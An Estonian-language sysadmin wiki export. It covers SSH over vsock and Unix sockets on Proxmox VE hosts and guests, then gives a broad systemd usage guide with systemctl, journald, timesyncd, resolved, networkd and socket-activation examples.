ssh kliendi st pve host poolel peab olema teadmine, kuidas käituda kui üritatakse kasutada vsock protokolli üle sshd serverit

<pre>
root@pve-wrx90e:~# cat /lib/systemd/ssh_config.d/20-systemd-ssh-proxy.conf
# SPDX-License-Identifier: LGPL-2.1-or-later
#
# Allow connecting to the local host directly via ".host"
Host .host machine/.host
ProxyCommand /usr/lib/systemd/systemd-ssh-proxy unix/run/ssh-unix-local/socket %p
ProxyUseFdpass yes
CheckHostIP no

# Make sure unix/* and vsock/* can be used to connect to AF_UNIX and AF_VSOCK paths.
# Make sure machine/* can be used to connect to local machines registered in machined.
#
Host unix/* vsock/* machine/*
ProxyCommand /usr/lib/systemd/systemd-ssh-proxy %h %p
ProxyUseFdpass yes
CheckHostIP no

# Disable all kinds of host identity checks, since these addresses are generally ephemeral.
StrictHostKeyChecking no
UserKnownHostsFile /dev/null
</pre>

kus

* tuleb kasutada 'man systemd-ssh-proxy' utiliiti

Kasutamine paistab välja selline

<pre>
root@pve-wrx90e:~# ssh root@vsock/50056
Warning: Permanently added 'vsock/50056' (ED25519) to the list of known hosts.
Linux unifi-oss 6.12.90+deb13.1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.90-2 (2026-05-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 31 23:53:37 2026 from 192.168.10.156
root@unifi-oss:~#

root@unifi-oss:~# w
23:59:55 up 6 min, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/1 - 23:59 1.00s 0.00s ? w
</pre>

kus

* vsock kaudu lähenemise puhul on iseloomulik 'FROM -' (tavaliselt on seal src ip aadress)

Peale kasutaja sisselogimist paistab

<pre>
root@unifi-oss:~# ss -a -p --vsock
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
v_str LISTEN 0 0 *:22 *:* users:(("systemd",pid=1,fd=66))
v_str ESTAB 0 0 50056:22 2:3327097366 users:(("sshd-session",pid=914,fd=7),("sshd-session",pid=914,fd=6),("sshd-session",pid=905,fd=7),("sshd-session",pid=905,fd=6),("systemd",pid=1,fd=8))
</pre>

kus

* af_vsock osakonnas on sarnasel af_inet osakonnale ka listen socket ning 'active connected socket'

Tundub, et uuemal ajal on ssh agar kuulama ka af_unix soketil

<pre>
root@unifi-oss:~# screendump | grep -i ssh
[ OK ] Listening on sshd-unix-local.socket - OpenSSH Server Socket (systemd-ssh-generator, AF_UNIX Local).
[ OK ] Listening on sshd-vsock.socket - OpenSSH Server Socket (systemd-ssh-generator, AF_VSOCK).
[ OK ] Reached target ssh-access.target - SSH Access Available.
Starting ssh.service - OpenBSD Secure Shell server...
[ OK ] Started ssh.service - OpenBSD Secure Shell server.
</pre>

ja tõesti, lokaalselt saab arvutisse logida sisse nii

<pre>
root@unifi-oss:~# ssh unix/run/ssh-unix-local/socket
Warning: Permanently added 'unix/run/ssh-unix-local/socket' (ED25519) to the list of known hosts.
Linux unifi-oss 6.12.90+deb13.1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.90-2 (2026-05-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jun 1 00:16:42 2026 from UNKNOWN

root@unifi-oss:~# w
00:16:44 up 23 min, 3 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/2 - 00:16 1.00s 0.00s ? w
root pts/1 - 00:16 2.00s 0.00s ? ssh unix/run/ssh-unix-local/socket
</pre>

Kasulikud lisamaterjalid

* https://www.auul.pri.ee/wiki/Linux_operatsioonis%C3%BCsteemis_t%C3%B6%C3%B6tab_v%C3%B5rgu%C3%BChendus#systemd_kasutamine_network-proxy_rollis

===Üle vsock ssh kasutamine - Ubuntu 24.04===

Ubuntu 24.04 keskkonnas on tehniliselt kõik vajalik vsock kasutamiseks olemas, tuleb lisada kaks system elementi

* sshd-vsock.socket - õpetab systemd pid=1 protsessile kuulama võrgus 22/vsock pordil
* sshd-vsock@.service - õpetab 22/vsock pordile sissetuleva pöördumist üleandmist sshd protsessile

<pre>
root@zabbix-pub-01:~# ls -ld /etc/systemd/system/sshd-vsock*
-rw-r--r-- 1 root root 380 Jun 20 15:38 /etc/systemd/system/sshd-vsock@.service
-rw-r--r-- 1 root root 265 Jun 20 13:33 /etc/systemd/system/sshd-vsock.socket
</pre>

ning

<pre>
root@zabbix-pub-01:~# cat /etc/systemd/system/sshd-vsock.socket
[Unit]
Description=OpenSSH Server Socket (AF_VSOCK Network-Independent Line)
Documentation=man:sshd(8) man:sshd_config(5)
# Notice: No "Conflicts=" or "Before=" entries are needed here!

[Socket]
ListenStream=vsock::22
Accept=yes

[Install]
WantedBy=sockets.target

root@zabbix-pub-01:~# cat /etc/systemd/system/sshd-vsock@.service
[Unit]
Description=OpenSSH Server Socket Per-Connection Daemon (VSOCK Backup)
Documentation=man:sshd(8) man:sshd_config(5)
After=auditd.service

[Service]
EnvironmentFile=-/etc/default/ssh
# The -i flag forces sshd to run in "inetd" mode to accept the raw systemd socket
ExecStart=-/usr/sbin/sshd -i $SSHD_OPTS
StandardInput=socket
RuntimeDirectory=sshd
RuntimeDirectoryMode=0755
</pre>

Käivitamiseks sobib öelda

<pre>
root@zabbix-pub-01:~# systemctl daemon-reload
root@zabbix-pub-01:~# systemctl enable --now sshd-vsock.socket
</pre>

Tulemusena kuulatakse 22/vsock peal

<pre>
root@zabbix-pub-01:~# systemctl list-sockets | grep ssh
192.168.10.194:22 ssh.socket ssh.service
vsock::22 sshd-vsock.socket -
</pre>

===Proxmox VE Firewall===

====Misc====

Probleeme tekitada võiv kombinatsioon, vältida

* Hardware -> network device -> Firewall - Enable
* Firewall -> Option - No

====Kasulikud lisamaterjalid====

* https://pve.proxmox.com/pve-docs-7/chapter-pve-firewall.html

===Misc===

Tundub, et pve 9 ja qemu 11 kandis on hakanud ilmuma 'x86_64 v2 aes' virtuaalse protsessori kasutamisel sellised teated, nt 'host' protsessoriga neid ei ole

<pre>
root@pve-wrx90e:~# pveversion
pve-manager/9.2.3/d0fde103346cf89a (running kernel: 7.0.6-2-pve)

root@pve-wrx90e:~# dmesg | grep WRMSR | tail -n 4
[30021.694536] kvm: kvm [323176]: vcpu0, guest rIP: 0xffffffffb807e744 Unhandled WRMSR(0xc0010007) = 0xffff
[30090.614209] kvm: kvm [324048]: vcpu0, guest rIP: 0xffffffff84e6d9b4 Unhandled WRMSR(0xc0010007) = 0xffff
[30308.798770] kvm: kvm [326811]: vcpu0, guest rIP: 0xffffffff8d67e744 Unhandled WRMSR(0xc0010007) = 0xffff
[180421.745980] kvm: kvm [3632532]: vcpu0, guest rIP: 0xffffffff81242297 Unhandled WRMSR(0xc0010007) = 0xffff
</pre>

===arm64 platvormi emuleerimine===

Tundub, et PVE v. 9.2 juures ilmub webgui peale vcpu valik 'arm (64-bit)'

[[Fail:20260614-pve-01.png|600px]]

kus

* TODO

<pre>
root@pve-svc-02:~# apt-get install pve-edk2-firmware-aarch6
</pre>

===Kasulikud lisamaterjalid===

* TODO

Systemd kasutamine

2026-06-20T14:13:36Z

Imre: /* bootshell */

===Sissejuhatus===

systemd http://freedesktop.org/wiki/Software/systemd/ ...

Tundub, et 2014 aasta lõpus on Debian v. 8 Jessie koosseisus vaikimisi systemd

# ls -ld /sbin/init
lrwxrwxrwx 1 root root 20 Sep 28 22:33 /sbin/init -> /lib/systemd/systemd

===Tööpõhimõte===

* Turvalisus ja tegevuste isoleerimine failisüsteemi ja võrgu tasemel, http://0pointer.de/blog/projects/security.html
* SysV käivitusskripti on imperatiivsed, st shell skriptid praktiliselt, systemd nö käivitusskriptid on deklaratiivsed, st nn .ini failidele sarnase sisuga

===Paigaldamine===

Tundub, et minimaalsele keskkonnale (nt debootstrap abil moodustatud) tuleb juurde lisada dbus ja polkit tugi, vastasel korral nt systemd-cgls programm ei tööta)

# apt-get install dbus libpolkit-agent-1-0

===Kasutamine===

Teenuse oleku küsimiseks sobib öelda

# systemctl status ssh.service
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
Active: active (running) since Tue 2014-11-04 02:43:10 EET; 18h ago
Main PID: 1956 (sshd)
CGroup: /system.slice/ssh.service
└─1956 /usr/sbin/sshd -D

kus

# cat /lib/systemd/system/ssh.service
[Unit]
Description=OpenBSD Secure Shell server
After=network.target auditd.service
ConditionPathExists=!/etc/ssh/sshd_not_to_be_run

[Service]
EnvironmentFile=-/etc/default/ssh
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
Restart=on-failure

[Install]
WantedBy=multi-user.target
Alias=sshd.service

Teenuste nimekirja esitamiseks

# systemctl list-units --type=service | head -n 5
UNIT LOAD ACTIVE SUB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active exited LSB: Start the Advanced Configuration and Power Interface daemon
amavis-mc.service loaded active exited LSB: Startup script for amavis master supervisor
amavis.service loaded active running LSB: Starts amavisd-new mailfilter

Tundub, et teenus saab olla mitmes olekus, üks variant teenuseid on sellised, mis arvuti käivitamisel nö korraks töötavad midagi sisse lülitades ja siis teevad exit, nt

# systemctl list-units --type=service --state=exited
UNIT LOAD ACTIVE SUB DESCRIPTION
getty-static.service loaded active exited getty on tty2-tty6 if dbus and logind are not available
kbd.service loaded active exited LSB: Prepare console
keymap.service loaded active exited LSB: Set keymap
modules_dep.service loaded active exited LSB: modules.dep creation.
netfilter-persistent.service loaded active exited netfilter persistent configuration
networking.service loaded active exited LSB: Raise network interfaces.
quota.service loaded active exited Check And Enable File System Quotas
rc-local.service loaded active exited /etc/rc.local Compatibility
systemd-random-seed.service loaded active exited Load/Save Random Seed

===systemd-timedated===

Tööpõhimõte

* systemd-timedated on dispetšer, mis vahendab seadistuse utiliiti timedatectl konkreetsete ntp serveritega (nt chrony, systemd-timesyncd)
* systemd-timedated ei tööta pidavalt, ta käivitub dbus juhtimisel

timedatectl programmiga saab seadistada ajavööndit jms

# timedatectl list-timezones
# timedatectl set-timezone Europe/Tallinn

systemd-timesyncd või chrony on ntp klient deemon, mis tuleb kasutamiseks sisse lülitada

# timedatectl set-ntp true

Tundub, et samaväärne on öelda

# systemctl enable systemd-timesyncd
# systemctl start systemd-timesyncd

või 'systemctl enable|disable chrony', aga ehk on õigem opereerida timedatectl abil

Töötamissel annab timedatactl saranase vastuse

# timedatectl status
Local time: Fri 2015-07-31 01:21:26 EEST
Universal time: Thu 2015-07-30 22:21:26 UTC
RTC time: Thu 2015-07-30 22:21:26
Time zone: Europe/Tallinn (EEST, +0300)
NTP enabled: yes
NTP synchronized: no
RTC in local TZ: no
DST active: yes
Last DST change: DST began at
Sun 2015-03-29 02:59:59 EET
Sun 2015-03-29 04:00:00 EEST
Next DST change: DST ends (the clock jumps one hour backwards) at
Sun 2015-10-25 03:59:59 EEST
Sun 2015-10-25 03:00:00 EET

kus

* valitud ajavööndi Daylight Saving Time algus ja lõpp
* kas NTP teenust töötab (systemd-timesyncd)

Spetsiifilise NTP serveri kasutamiseks sobib näidata ta seadistusfailis /etc/systemd/timesyncd.conf

# cat /etc/systemd/timesyncd.conf
[Time]
Servers=10.192.0.53

ja muudatuse kehtestamiseks öelda

# systemctl restart systemd-timesyncd

Tulemusena

# systemctl status systemd-timesyncd
● systemd-timesyncd.service - Network Time Synchronization
Loaded: loaded (/lib/systemd/system/systemd-timesyncd.service; enabled)
Active: active (running) since Fri 2015-07-31 09:13:18 EEST; 1min 43s ago
Docs: man:systemd-timesyncd.service(8)
Main PID: 1179 (systemd-timesyn)
Status: "Using Time Server 10.192.0.53:123 (10.192.0.53)."
CGroup: /system.slice/systemd-timesyncd.service
└─1179 /lib/systemd/systemd-timesyncd

Jul 31 09:13:17 postkast systemd-timesyncd[1179]: Using NTP server 10.192.0.53:123 (10.192.0.53).
Jul 31 09:13:18 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 32s/+0.621s/0.000s/0.000s/+0ppm
Jul 31 09:13:50 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 64s/+0.000s/0.000s/0.000s/+0ppm
Jul 31 09:14:54 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 128s/-0.000s/0.000s/0.000s/+0ppm

Taustal tegutseb lisaks systemd-timedated deemon, mis on static, st teda kutsutakse automaatselt vajadusel välja, st käivitatakse

# systemctl status systemd-timedated
● systemd-timedated.service - Time & Date Service
Loaded: loaded (/lib/systemd/system/systemd-timedated.service; static)
Active: inactive (dead)
Docs: man:systemd-timedated.service(8)
man:localtime(5)
http://www.freedesktop.org/wiki/Software/systemd/timedated

Seos busctl osakonnaga

<pre>
root@ns-pg-01:~# busctl | grep time
org.freedesktop.timedate1 - - - (activatable) - - -

root@ns-pg-01:~# timedatectl status
Local time: Wed 2026-06-03 01:26:34 EEST
Universal time: Tue 2026-06-02 22:26:34 UTC
RTC time: Tue 2026-06-02 22:26:34
Time zone: Europe/Tallinn (EEST, +0300)
System clock synchronized: yes
NTP service: active
RTC in local TZ: no

root@ns-pg-01:~# busctl | grep time
:1.34 2449 systemd-timedat root :1.34 systemd-timedated.service - -
org.freedesktop.timedate1 2449 systemd-timedat root :1.34 systemd-timedated.service - -
</pre>

===Rakenduste kasutamine systemd keskkonnas===

====PostgreSQL kasutamine====

Mitme PostgreSQL protsesside komplekti kasutamiseks sobib esmalt järgmise eksemplari osa failisüsteemis ettevalmistada nö tavalisel viisil

# pg_createcluster 9.4 test

ning käivitada

# systemctl start postgresql@9.4-test

Mitme PostgreSQL protsesside komplekti kasutamine paistab sedasi

# ps -U postgres -o pid,user,cgroup:150,args
PID USER CGROUP COMMAND
10064 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service /usr/lib/postgresql/9.4/bin/postgres -D /va ...
10070 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: checkpointer process
10072 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: writer process
10074 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: wal writer process
10076 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: autovacuum launcher process
10078 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: stats collector process

10331 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service /usr/lib/postgresql/9.4/bin/postgres -D /var ...
10333 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: checkpointer process
10334 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: writer process
10335 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: wal writer process
10336 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: autovacuum launcher process
10337 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: stats collector process

kus

* erinevate PostgreSQL protsessi kompilektide protsessid on sama süsteemi kasutaja postgres omad, aga kuuluvad erinevatesse kerneli CGROUP'idesse

Tapmiseks nö -9 signaaliga

# systemctl kill -s SIGKILL postgresql@9.4-test.service

====Samba====

Teenuste seiskamine

# systemctl stop smbd
# systemctl stop nmbd

kontrolliks

# ps aux | grep mb

AD kasutamiseks

# systemctl start samba-ad-dc

====OpenVPN====

Kui OpenVPN kliendi seadisus asub failis /etc/openvpn/client.conf, siis käivitamiseks sobib öelda

# systemctl start openvpn@client.service

====Serial konsool====

Serial konsooli käivitamiseks sobib öelda

# systemctl enable serial-getty@ttyS0.service
Created symlink from /etc/systemd/system/getty.target.wants/serial-getty@ttyS0.service \
to /lib/systemd/system/serial-getty@.service.

# systemctl start serial-getty@ttyS0.service

Tulemusena saab ipmitool, cu, minicom jt programmide abil pöörduda serial konsooli poole.

====NUT====

Tundub, et töötab, nt

# systemctl status nut-server
# systemctl status nut-client

====iptables====

Kasulikud lisamaterjalid

* http://www.auul.pri.ee/wiki/Iptables_kasutamine_Debianiga#iptables-persistant

====rsyslog====

Peatamiseks

# systemctl stop syslog.socket rsyslog.service

vastasel korral tuleb sõnum sisse ja rsyslog teenus käivitatakse automaatselt.

====Varnish====

Kuulava pordi muutmine failis

# grep ^ExecS /lib/systemd/system/varnish.service
ExecStart=/usr/sbin/varnishd -j unix,user=vcache -F -a :80 -T localhost:6082 -f /etc/varnish/default.vcl -S /etc/varnish/secret -s malloc,256m

Logimisel X-Forwarded-For kasutamiseks

# grep ^ExecS /lib/systemd/system/varnishncsa.service
ExecStart=/usr/bin/varnishncsa -F '%%{X-Forwarded-For}i %%l %%u %%t \"%%r\" %%s %%b \"%%{Referer}i\" \"%%{User-agent}i\"' -a -w /var/log/varnish/varnishncsa.log

Muudatuste kehtestamiseks

# systemctl daemon-reload
# /etc/init.d/varnishncsa restart
# /etc/init.d/varnish restart

Logis on näha X-Forwarded-For päisest tulnud aadress ning tcp ühenduse teise otspunkti aadress

<pre>
# tail -f /var/log/varnish/varnishncsa.log
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
...
</pre>

===Logimine===

Systemd sisaldab logimise komponenti journald.

====Süsteemi alglaadimine====

Logimise haldusutiliit näitab vaikimisi kogu kogutud logi alates viimasest alglaadimisest, vanemad sissekanded eespool

# journalctl
-- Logs begin at Mon 2015-07-27 23:03:45 EEST, end at Tue 2015-07-28 08:41:14 EEST. --
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuset
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpu
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuacct
Jul 27 23:03:45 systemd kernel: Linux version 4.0.0-2-amd64 (debian-kernel@lists.debian.org) (gcc version 4.9.3 (Debian 4.9.3-2) ) #1 SMP Debian 4.0.8-2 (2015-07-22)
Jul 27 23:03:45 systemd kernel: Command line: BOOT_IMAGE=/vmlinuz-4.0.0-2-amd64 root=/dev/mapper/systemd-root ro console=ttyS0,9600
...

journald töötamisest annab tunnistust protsess

# ps aux | grep journald
..
root 172 0.1 1.0 35112 5208 ? Ss 08:55 0:00 /lib/systemd/systemd-journald

====Märkused====

Tundub, et vahel võib The Journal seisma jääda (nt saab failisüsteem täis vms), see paistab sedasi ja midagi ei logita (nt logger protsessiga)

Mar 28 03:37:01 keskus systemd-journal[29787]: Journal stopped
-- Subject: The Journal has been stopped
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel

Käivitamiseks

# systemctl start systemd-journald

# journalctl -xn
...
May 19 02:36:01 keskus systemd[1]: Starting Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Started Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket.
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket.
May 19 02:36:01 keskus systemd[1]: Starting Journal Service...
May 19 02:36:01 keskus systemd[1]: Started Journal Service.
May 19 02:36:01 keskus systemd-journal[32447]: Journal started
-- Subject: The Journal has been started
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel
--
-- The system journal process has been starting up, opened the journal
-- files for writing and is now ready to process requests.

====Apache veebiserver====

Kui Apache seadistusfailis on viga, siis see paistab journald juurest välja selline

# journalctl -u apache2
..
Jul 28 09:11:31 systemd systemd[1]: Starting LSB: Apache2 web server...
Jul 28 09:11:31 systemd apache2[2491]: Starting web server: apache2 failed!
Jul 28 09:11:31 systemd apache2[2491]: The apache2 configtest failed. ... (warning).
Jul 28 09:11:31 systemd apache2[2491]: Output of config test was:
Jul 28 09:11:31 systemd apache2[2491]: AH00526: Syntax error on line 1 of /etc/apache2/sites-enabled/000-default.conf:
Jul 28 09:11:31 systemd apache2[2491]: <VirtualHost> directive missing closing '>'
Jul 28 09:11:31 systemd apache2[2491]: Action 'configtest' failed.
Jul 28 09:11:31 systemd apache2[2491]: The Apache error log may have more information.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Control process exited, code=exited status=1
Jul 28 09:11:31 systemd systemd[1]: Failed to start LSB: Apache2 web server.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Unit entered failed state.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Failed with result 'exit-code'.

kus

* journald tegeleb apache2 protsessidega seotud nö süsteemse logiga, mitte http päringute logimisega

====Kasulikud lisamaterjalid====

* https://www.digitalocean.com/community/tutorials/how-to-use-journalctl-to-view-and-manipulate-systemd-logs
* http://0pointer.de/blog/projects/journalctl.html

===targetite vahel liikumine===

Nö init=/bin/bash keskkonda liikumiseks tuleb kasutada bootloaderis tuuma real parameetrit

systemd.unit=emergency.target

tulemusena jõutakse (arvuti hostname on antud juhul systemd)

..
Welcome to Debian GNU/Linux stretch/sid!

[260222.496889] systemd[1]: Set hostname to <systemd>.
[ OK ] Created slice Root Slice.
[260223.089638] systemd[1]: Created slice Root Slice.
[260223.096748] systemd[1]: Starting Root Slice.
[ OK ] Created slice System Slice.
[260223.109289] systemd[1]: Created slice System Slice.
[260223.115005] systemd[1]: Starting System Slice.
[ OK ] Started Emergency Shell.
[260223.134133] systemd[1]: Started Emergency Shell.
[260223.146296] systemd[1]: Starting Emergency Shell...
Starting Emergency Shell...
[ OK ] Reached target Emergency Mode.
[260223.192047] systemd[1]: Reached target Emergency Mode.
[260223.205684] systemd[1]: Startup finished in 3.658s (kernel) + 967ms (userspace) = 4.626s.
[260223.221455] systemd[1]: Starting Emergency Mode.
[260223.232336] systemd[157]: emergency.service: Failed at step EXEC spawning /bin/plymouth: No such file or directory
Welcome to emergency mode! After logging in, type "journalctl -xb" to view
system logs, "systemctl reboot" to reboot, "systemctl default" or ^D to
try again to boot into default mode.
Give root password for maintenance
(or press Control-D to continue): <root parool>
root@systemd:~#

Tavalisse nn multi-user režiimi jõudmiseks sobib öelda seejärel

# systemctl isolate multi-user.target

Arvuti väljalülitamiseks sh toitest

# systemctl poweroff

===systemd-socket-proxyd===

systemd-ocket-proxyd võimaldab käivitada teenuse selle poole pöördumisel. Nt nginx protsessid käivitatakse port 80 poole pöördumisel. Selleks tuleb

* seadistada nginx server kuulama port 8080

# cat /etc/nginx/sites-available/default
..
server {
listen 8080 default_server;
...

* tekitada .service tüüpi unit (erinevalt man systemd-socket-proxyd soovitusest on JoinsNamespaceOf ja PrivateNetwork välja kommenteeritud ja lülitatud)

# cat /etc/systemd/system/proxy-to-nginx.service
[Unit]
Rquires=nginx.service
After=nginx.service
# JoinsNamespaceOf=nginx.service

[Service]
ExecStart=/lib/systemd/systemd-socket-proxyd 127.0.0.1:8080
PrivateTmp=yes
PrivateNetwork=no

* tekitada .socket tüüpi unit

# cat /etc/systemd/system/proxy-to-nginx.socket
[Socket]
ListenStream=80

[Install]
WantedBy=sockets.target

Seejärel tuleb sisse lülitada ja käivitada socket unit (nginx ise ega proxy-to-nginx.service ei pea töötama)

# systemctl enable proxy-to-nginx.socket
# systemctl start proxy-to-nginx.socket

Tulemusena pöördudes aadressile http://127.0.0.1:80/ käivitatakse .service ja nginx protsessid.

Kasulikud lisamaterjalid

* https://developer.atlassian.com/blog/2015/03/docker-systemd-socket-activation/
* man systemd-socket-proxyd

===systemd-resolved===

Paigaldada pakett libnss-resolve

# apt-get install libnss-resolve

Kirjeldada meelepärane nö ISP nimeserver

# cat /etc/systemd/resolved.conf

[Resolve]
DNS=10.192.0.53

Lülitada sisse systemd-resolved

# systemctl start systemd-resolved
# systemctl enable systemd-resolved

Testida systemd-resolved rekursiivse nimeserveri töötamist

# /lib/systemd/systemd-resolve-host kuutorvaja.eenet.ee
kuutorvaja.eenet.ee: 193.40.0.7

-- Information acquired via protocol DNS in 157.3ms.

Kustutada fail /etc/resolv.conf

# rm /etc/resolv.conf

Kasutada failis /etc/nsswitch.conf rida

hosts: files resolve dns

Soovi korral

# ln -fs /run/systemd/resolve/resolv.conf /etc/resolv.conf

Debugi sisselülitamine

# cp /lib/systemd/system/systemd-resolved.service /etc/systemd/system

kus on sektsioonis Service lisatud debug

[Service]

..
Environment=SYSTEMD_LOG_LEVEL=debug

dns cache jms logisse kirjutamiseks

# kill -SIGUSR1 PID

Tulemuse esitamine

# systemd-resolve --status

Logi jälgimine

# journalctl -f -u systemd-resolved

===localectl===

# localectl list-locales
C.UTF-8
en_US.utf8

===Service haldamine===

Käivitamine

# systemctl start apache2

Oleku küsimine

# systemctl status apache2

Seiskamine

# systemctl stop apache2

Väljalülitamine, st selliselt seadistatud teenust ei käivitata automaatselt (süsteemi alglaadimisel, mingi event esinemisel vms), aga käsitsi start abil saab käivitada

# systemctl disable apache2

Sisselülitamiseks

# systemctl enable apache2

Maskeerimine, selliselt seadistatud teenust ei saa üldse käivitada

# systemctl mask apache2

Maskeerimise väljalülitamiseks

# systemctl unmask apache2

Kõigi service'ite nimekirja küsimine (töötavate küsimiseks jätta -a ära; sarnaselt saab küsida target, socket, mount)

# systemctl list-units --type service -a

Kõigi failide nimekirja küsimine

# systemctl list-unit-files --type=service

systemd seadistustes tehtud muudatuste esitamine

# systemd-delta

Sõltuvuste nimekirja esitamine

# systemctl list-dependencies sshd.service

Teenuse omaduste esitamiseks

# systemctl show sshd.service

Unitite seadistusfailidega töötamiseks sobib öelda (vastavalt redigeeritakse /etc/systemd/system/nginx.service, /etc/systemd/system/nginx.service.d/failinimi või esitatakse faili sisu)

# systemctl edit --full nginx.service
# systemctl edit nginx.service
# systemctl cat nginx.service

===systemd-networkd===

systemd-networkd tegeleb võrgu seadistamisega. Nt nspawn konteinerile saab võrgu seadistada selliselt

* seadistada konteinerit hostiva arvuti võrguühendus nt bridge-utils bridge abil

* tekitada konteinerisse seadistusfail (kui arvutis on mitu võrguliidest, siis võiks iga liidese jaoks olla oma fail)

# cat /etc/systemd/network/50-static.network
[Match]
Name=host0

[Network]
Address=192.168.10.16/24
Gateway=192.168.10.254

* /etc/network/interfaces failis kirjeldada vaid lo seade

# cat /etc/network/interfaces
source /etc/network/interfaces.d/*
auto lo
iface lo inet loopback

* võrgu käivitamiseks öelda

# systemctl start systemd-networkd

* ipv4 ja ipv6 aadressi seadistamiseks

..
[Network]
Gateway=192.168.10.254

[Address]
Address=192.168.10.16/24

[Address]
Address=110:1/64

===Konsooli alglaadimisjärgse puhastamise lõpetamine===

Järgneva töötamise eelduseks on /etc/default/grub failis "quiet" eemaldamine, vt man systemd -> ShowStatus 'Defaults to enabled, unless quiet is passed as kernel command line option, in which case it defaults to error.' Alternatiiv on kasutada kernel argumenti 'systemd.show_status=1'.

Viisakas variant

<pre>
# systemctl edit getty@tty1
..

[Service]
TTYVTDisallocate=no

...
</pre>

Vulgaarsem variant

# mkdir /etc/systemd/system/getty@tty1.service.d
# cat /etc/systemd/system/getty@tty1.service.d/noclear.conf
[Service]
TTYVTDisallocate=no

Ja järgmisel alglaadimisel enam ekraani ei puhastata

# reboot

NB! Selleks, et tuuma teateid oleks näha tuleb lisaks GRUB2 seadistusfailis kasutada rida

# cat /etc/default/grub
..
GRUB_CMDLINE_LINUX_DEFAULT=""
...

ning öelda

# update-grub

Kasulikud lisamaterjalid

* http://mywiki.wooledge.org/SystemdNoClear
* https://wiki.archlinux.org/index.php/Systemd_FAQ

===journalctl kasuamine===

Bootimisest alates antud logi sissekannete esitamiseks sobib öelda

# journalctl -b

Selleks, et näha erinevate bootimiskordade logi tuleb öelda

# mkdir /var/log/journal
# sed -ri s/^#Storage=auto/Storage=persistent/ /etc/systemd/journald.conf

tulemusena saab nimekirja vaadata

# journalctl --list-boots

ning konkreetse korra sissekandeid nt

# journalctl -b -2

Uniti vms logi follow režiimis esitamiseks

# journalctl -n 20 -f -u ssh

===systemd-cat===

TODO

===Systemd debugimine===

TODO

Kasulikud lisamaterjalid

* http://freedesktop.org/wiki/Software/systemd/Debugging/

===Ressursikasutuse kontrollimine===

# grep -v "^#" /etc/systemd/system.conf

[Manager]
DefaultCPUAccounting=yes
DefaultBlockIOAccounting=yes
DefaultMemoryAccounting=yes

# systemctl set-property nginx.service MemoryLimit=10M

===systemd-run===

$ systemd-run --user --unit=limit-test.scope --scope -p MemoryAccounting=yes -p MemoryLimit=2M bash

$ systemctl show --user limit-test.scope | grep Mem
MemoryAccounting=yes
MemoryLimit=2M

või

<pre>
root@ph-minio-01:~# systemd-run --user --scope -p MemoryMax=10M -p MemorySwapMax=0 bash
